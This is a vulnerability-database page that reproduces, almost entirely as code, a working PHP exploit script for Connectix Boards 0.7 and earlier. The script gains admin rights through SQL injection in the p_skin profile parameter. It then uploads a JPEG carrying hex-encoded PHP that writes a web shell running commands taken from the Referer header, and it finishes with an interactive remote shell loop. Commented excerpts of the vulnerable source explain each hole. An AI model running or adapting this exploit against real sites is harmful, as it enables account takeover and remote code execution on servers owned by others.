Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:6248
HistoryFeb 23, 2007 - 12:00 a.m.

Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

2007-02-2300:00:00
Root
www.seebug.org
21
JSON

No description provided by source.


                                                #!/usr/bin/php
<?php
error_reporting(E_ALL&nbsp;^&nbsp;E_NOTICE);

if($argc&nbsp;<&nbsp;9)&nbsp;{
print(\"
&nbsp;Connectix&nbsp;Boards&nbsp;<=&nbsp;0.7&nbsp;(p_skin)&nbsp;Multiple&nbsp;Vulnerabilities&nbsp;Exploit
-------------------------------------------------------------------
PHP&nbsp;conditions:&nbsp;none
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Credits:&nbsp;DarkFig&nbsp;<[email protected]>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;http://www.acid-root.new.fr/
-------------------------------------------------------------------
&nbsp;&nbsp;Usage:&nbsp;$argv[0]&nbsp;-url&nbsp;<>&nbsp;-usr&nbsp;<>&nbsp;-pwd&nbsp;<>&nbsp;-type&nbsp;<>&nbsp;[Options]
&nbsp;Params:&nbsp;-url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;For&nbsp;example&nbsp;http://victim.com/connectix/&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-usr&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;username&nbsp;of&nbsp;your&nbsp;account
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-pwd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;password&nbsp;of&nbsp;your&nbsp;account
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Privilege&nbsp;Escalation(1)&nbsp;or&nbsp;Code&nbsp;execution(2)
Options:&nbsp;-proxy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;wanna&nbsp;use&nbsp;a&nbsp;proxy&nbsp;<proxyhost:proxyport>&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxyauth&nbsp;Basic&nbsp;authentification&nbsp;<proxyuser:proxypwd>&nbsp;
-------------------------------------------------------------------
\");&nbsp;exit(1);
}

$url&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'url\',1);
$user&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'usr\',1);
$pass&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'pwd\',1);
$type&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'type\',1);
$proxy&nbsp;&nbsp;=&nbsp;getparam(\'proxy\');
$authp&nbsp;&nbsp;=&nbsp;getparam(\'proxyauth\');
$theme&nbsp;&nbsp;=&nbsp;\'Zephyr\';

$xpl&nbsp;=&nbsp;new&nbsp;phpsploit();
$xpl->agent(\"Mozilla&nbsp;Firefox\");
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($proxy)&nbsp;$xpl->proxy($proxy);
if($authp)&nbsp;$xpl->proxyauth($authp);

print&nbsp;\"
Trying&nbsp;to&nbsp;get&nbsp;logged&nbsp;in\";
$xpl->post($url.\'index.php?act=login\',\"username=$user&password=$pass&remember=on&confirm=Connexion+%21\");
if(preg_match(\"#password#\",$xpl->showcookie()))&nbsp;print&nbsp;\"
Logged&nbsp;in\";
else&nbsp;exit(\"
Exploit&nbsp;failed\");

sploit(\",&nbsp;usr_class=1\");
if($type==1)&nbsp;exit(\"
Done,&nbsp;$user&nbsp;is&nbsp;now&nbsp;admin.\");

#&nbsp;Fake&nbsp;JPG&nbsp;(with&nbsp;php&nbsp;code)&nbsp;generated&nbsp;with&nbsp;edjpgcom.exe
#
#&nbsp;<?php&nbsp;$handle=fopen(\'mdrpipicacalolxdwtf.gif.php\',\'w+\');
#&nbsp;fwrite($handle,\'<?php&nbsp;@system($_SERVER[HTTP_REFERER]);&nbsp;?/>\');
#&nbsp;fclose($handle);&nbsp;unlink($_SERVER[PHP_SELF]);&nbsp;?/>
#
$f&nbsp;=&nbsp;\"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x60x00x00xFF\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x0Ax0Cx14\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32x32\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32xFFxFEx00\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx70x65x6E\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x64x77x74\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx66x77x72\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x70x20x40\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x54x54x50\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx66x63x6C\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx69x6Ex6B\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx46x5Dx29\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x02x11x01\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x00x00x00\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx01x02x03\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17x18x19\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x95x96x97\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8xF9xFAxFF\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x00x00x00\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x00x02x01\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x11x04x05\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19x1A\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x49x4Ax53\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97x98x99\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00x0Cx03\"
&nbsp;&nbsp;&nbsp;&nbsp;.\"x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9\";

#&nbsp;+admin.bbcode.php
#&nbsp;|
#&nbsp;95.&nbsp;if(isset($_POST[\'wherefile\']))&nbsp;{
#&nbsp;96.&nbsp;if&nbsp;($_POST[\'wherefile\']==\'upload\')&nbsp;{
#&nbsp;97.&nbsp;if&nbsp;(!empty($_FILES[\'uploadimage\'][\'size\'])){
#&nbsp;98.&nbsp;if&nbsp;($image=getimagesize(trim($_FILES[\'uploadimage\'][\'tmp_name\'])))&nbsp;{
#&nbsp;99.&nbsp;$val&nbsp;=&nbsp;array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);
#&nbsp;100.&nbsp;if&nbsp;($_FILES[\'uploadimage\'][\'size\']&nbsp;<=&nbsp;20480&nbsp;&&&nbsp;in_array($image[2],$val))&nbsp;{
#&nbsp;101.&nbsp;$filename&nbsp;=&nbsp;$smile->smiley_librariesdir.$_POST[\'sm_filenameserver\'];
#&nbsp;102.&nbsp;$filename&nbsp;=&nbsp;str_replace(\'../\',\'\',trim($filename));
#&nbsp;103.&nbsp;//si&nbsp;le&nbsp;filenameserver&nbsp;contient&nbsp;un&nbsp;dossier&nbsp;:&nbsp;on&nbsp;cr?e&nbsp;ce&nbsp;dossier:
#&nbsp;104.&nbsp;mkdirs($smile->smiley_dir.dirname($filename));
#&nbsp;105.&nbsp;if&nbsp;(move_uploaded_file($_FILES[\'uploadimage\'][\'tmp_name\'],&nbsp;$smile->smiley_dir.$_POST[\'sm_filenameserver\']))&nbsp;{
#&nbsp;106.&nbsp;$do=true;
#&nbsp;107.&nbsp;}
#
$arr&nbsp;=&nbsp;array(frmdt_url&nbsp;=>&nbsp;$url.\'admin.php?act=bb&sub=4\',
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"sm_name\"&nbsp;=>&nbsp;\":AbCdEfGhIj1234dsupersmilepowaa:\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"sm_filenamesubdir\"&nbsp;=>&nbsp;\"libraries/\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"sm_filenameserver\"&nbsp;=>&nbsp;\"xd.gif.php\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"wherefile\"&nbsp;=>&nbsp;\"upload\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"sm_send\"&nbsp;=>&nbsp;\"Confirmer\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"uploadimage\"&nbsp;=>&nbsp;array(frmdt_type&nbsp;=>&nbsp;\"image/gif\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_filename&nbsp;=>&nbsp;\"xd.gif.php\",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_content&nbsp;=>&nbsp;$f));
$xpl->formdata($arr);
$xpl->get($url.\"smileys/xd.gif.php\");
print&nbsp;\"
$shell>&nbsp;\";

while(!preg_match(\"#^(quit|exit)$#\",($cmd&nbsp;=&nbsp;trim(fgets(STDIN)))))
{
&nbsp;&nbsp;&nbsp;&nbsp;$xpl->addheader(\"Referer\",$cmd);
&nbsp;&nbsp;&nbsp;&nbsp;$xpl->get($url.\"smileys/mdrpipicacalolxdwtf.gif.php\");
&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;$xpl->getcontent().\"
$shell>&nbsp;\";
}&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

function&nbsp;sploit($sql)
{
	global&nbsp;$url,$xpl,$theme,$user;
	$pdat&nbsp;=&nbsp;\"changeparams=1\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_usrs=20\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_topics=20\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_msgs=15\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_res=12\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_skin=$theme\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"%00\',usr_pref_skin=\'$theme\',usr_signature=(SELECT&nbsp;\'[XPL_IS_OK]\')$sql&nbsp;WHERE&nbsp;usr_name=\'$user\'&nbsp;#\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_lang=fr\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.\"&p_timezone=1\";

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;+common.php
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;95.&nbsp;function&nbsp;cleanArray(&$arr)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;96.	if&nbsp;(!empty($arr)&nbsp;&&&nbsp;is_array($arr))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;97.		foreach($arr&nbsp;as&nbsp;$k&nbsp;=>&nbsp;$v)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;98.			if&nbsp;(is_array($v))&nbsp;cleanArray($arr[$k]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;99.			else&nbsp;$arr[$k]&nbsp;=&nbsp;stripslashes($v);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;100.		}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;101.	}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;102.&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;105.&nbsp;if&nbsp;(get_magic_quotes_gpc())&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;106.	cleanArray($_POST);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;107.	cleanArray($_COOKIE);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;108.	cleanArray($_GET);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;109.&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;+part.userprofile.php
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;305.&nbsp;/*&nbsp;Changement&nbsp;des&nbsp;param?tres&nbsp;d\'affichage&nbsp;(pas&nbsp;accessible&nbsp;par&nbsp;les&nbsp;modos&nbsp;ou&nbsp;admins)&nbsp;*/
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;306.&nbsp;}&nbsp;elseif&nbsp;(isset($_POST[\'changeparams\'])&nbsp;&&&nbsp;$edit_id==$_SESSION[\'userid\'])&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;307.&nbsp;if&nbsp;(&nbsp;isset($_POST[\'p_usrs\'],$_POST[\'p_topics\'],$_POST[\'p_msgs\'],$_POST[\'p_res\'],$_POST[\'p_skin\'],$_POST[\'p_lang\'],$_POST[\'p_timezone\'])&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;308.&nbsp;if&nbsp;(is_numeric($_POST[\'p_usrs\'])&nbsp;&&&nbsp;is_numeric($_POST[\'p_topics\'])&nbsp;&&&nbsp;is_numeric($_POST[\'p_msgs\'])&nbsp;&&&nbsp;is_numeric($_POST[\'p_res\'])&nbsp;&&&nbsp;isLang($_POST[\'p_lang\'])&nbsp;&&&nbsp;isSkin($_POST[\'p_skin\']))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;309.&nbsp;if&nbsp;((int)$_POST[\'p_usrs\']>=5&nbsp;&&&nbsp;(int)$_POST[\'p_usrs\']<=50&nbsp;&&&nbsp;(int)$_POST[\'p_topics\']>=5&nbsp;&&&nbsp;(int)$_POST[\'p_topics\']<=50&nbsp;&&&nbsp;(int)$_POST[\'p_msgs\']>=5&nbsp;&&&nbsp;(int)$_POST[\'p_msgs\']<=50&nbsp;&&&nbsp;(int)$_POST[\'p_res\']>=5&nbsp;&&&nbsp;(int)$_POST[\'p_res\']<=50&nbsp;&&&nbsp;in_array($_POST[\'p_timezone\'],array_keys($timezones)))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;310.&nbsp;$GLOBALS[\'cb_db\']->query(\"UPDATE&nbsp;\".$GLOBALS[\'cb_db\']->prefix.\"users&nbsp;SET&nbsp;usr_pref_msgs=\'\".(int)$_POST[\'p_msgs\'].\"\',usr_pref_usrs=\'\".(int)$_POST[\'p_usrs\'].\"\',usr_pref_topics=\'\".(int)$_POST[\'p_topics\'].\"\',usr_pref_res=\'\".(int)$_POST[\'p_res\'].\"\',usr_pref_lang=\'\".$_POST[\'p_lang\'].\"\',usr_pref_skin=\'\".$_POST[\'p_skin\'].\"\',usr_pref_timezone=\'\".$_POST[\'p_timezone\'].\"\',usr_pref_ctsummer=\".((int)(isset($_POST[\'p_ctsummer\'])&nbsp;&&&nbsp;$_POST[\'p_ctsummer\']==\'on\')).\"&nbsp;WHERE&nbsp;usr_id=\".$_SESSION[\'cb_user\']->userid);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;311.&nbsp;$_SESSION[\'cb_user\']->reloadnext=true;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;312.&nbsp;redirect(manage_url(\'index.php?act=user&editprofile=\'.$_SESSION[\'userid\'].\'&page=6\',\'forum-profile\'.$_SESSION[\'userid\'].\'-params.html\'));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;+lib.cb.php
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;117.&nbsp;function&nbsp;isLang&nbsp;($langtype)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;118.	return&nbsp;is_dir(CB_PATH.\'lang/\'.$langtype);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;119.&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;133.&nbsp;function&nbsp;isSkin&nbsp;($skintype)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;134.	return&nbsp;is_dir(CB_PATH.\'skins/\'.$skintype);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;135.&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$xpl->post($url.\"index.php?act=user&editprofile=-1&page=6\",$pdat);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$xpl->get($url.\"index.php?act=user&editprofile=-1&page=5\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(preg_match(\'#[XPL_IS_OK]#\',$xpl->getcontent()))&nbsp;return;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;exit(\"Exploit&nbsp;failed\");
}

function&nbsp;getparam($param,$opt=\'\')
{
	global&nbsp;$argv;
	foreach($argv&nbsp;as&nbsp;$value&nbsp;=>&nbsp;$key)
	{
		if($key&nbsp;==&nbsp;\'-\'.$param)&nbsp;return&nbsp;$argv[$value+1];
	}
	if($opt)&nbsp;exit(\"
-$param&nbsp;parameter&nbsp;required\");
	else&nbsp;return;
}

/*
&nbsp;*&nbsp;
&nbsp;*&nbsp;Copyright&nbsp;(C)&nbsp;darkfig
&nbsp;*&nbsp;
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp;
&nbsp;*&nbsp;modify&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;
&nbsp;*&nbsp;as&nbsp;published&nbsp;by&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;either&nbsp;version&nbsp;2&nbsp;
&nbsp;*&nbsp;of&nbsp;the&nbsp;License,&nbsp;or&nbsp;(at&nbsp;your&nbsp;option)&nbsp;any&nbsp;later&nbsp;version.&nbsp;
&nbsp;*&nbsp;
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,&nbsp;
&nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of&nbsp;
&nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the&nbsp;
&nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.&nbsp;
&nbsp;*&nbsp;
